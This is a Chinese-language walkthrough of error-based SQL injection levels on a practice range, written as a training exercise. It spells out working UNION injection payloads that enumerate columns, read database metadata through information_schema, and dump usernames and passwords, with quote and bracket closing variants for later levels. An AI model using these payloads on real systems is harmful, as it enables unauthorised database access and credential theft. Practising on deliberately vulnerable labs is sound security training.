本次实战靶场用的封神台的SQL注入靶场。
靶场链接:http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1
看过实战1后,咱们就直接来试试自己有没有学会。因为是靶场,所以肯定存在漏洞,咱们就不判断是否存在注入了。
第一步:从页面显示来看,这种应该是一个数字型的回显注入。那么我们就来看看有几列。
构造?id=1 and 1=1 group by 1
发现页面没有报错,继续往后group by 2和group by 3...,当试到4的时候发现查询不到了,由此判断应该是有三个字段。
第二步:确定有三列以后,接着看看回显的点。
构造?id=1 and 1=2 union select 1,2,3
有了这两个回显点后,我们就可以简单查询一些信息了,像版本、当前数据库名、所属用户等等。
构造?id=1 and 1=2 union select 1,version(),user()
第三步:由第二步获得了当前数据库的名称为error ,接着我们就可以获取数据库的一些信息了。
1、查询所有表:
?id=1%20and%201=2%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())
2、查询表的字段 :以user表为例
构造?id=1%20and%201=2%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27user%27%20limit%200,1
通过更改limit函数后面的数值可以得出此表的三个字段为Id,userame,password
3.查询某个表中的所有字段 (此例为 error数据库中的user表):
构造 ?id=1 and 1=2 union select 1,username,password from user limit 0,1
当然这是第一关,后面几关就是绕过问题,绕过的姿势一定要帅。我这边也给大家一并做了吧
第二关:发现多加了单引号
那么我们闭合单引号
构造?id=1%27%20and%201=2%20union%20select%201,2,3%23 就可以搞定了,后面跟前面一样,我就说个思路。
第三关:在第二关基础上加括号,一样的闭合括号
那么我们构造?id=1%27)%20and%201=2%20union%20select%201,2,3%23 就可以解决
第四关:单引号变双引号
构造?id=1")%20and%201=2%20union%20select%201,2,3%23
如果大家觉得不过瘾,有一个靶场是sql-labs,大家可以自行搭建这个靶场练习。
至此,SQL注入的显错注入练习借结束了。下一篇盲注实战,喜欢的多多关注,感谢。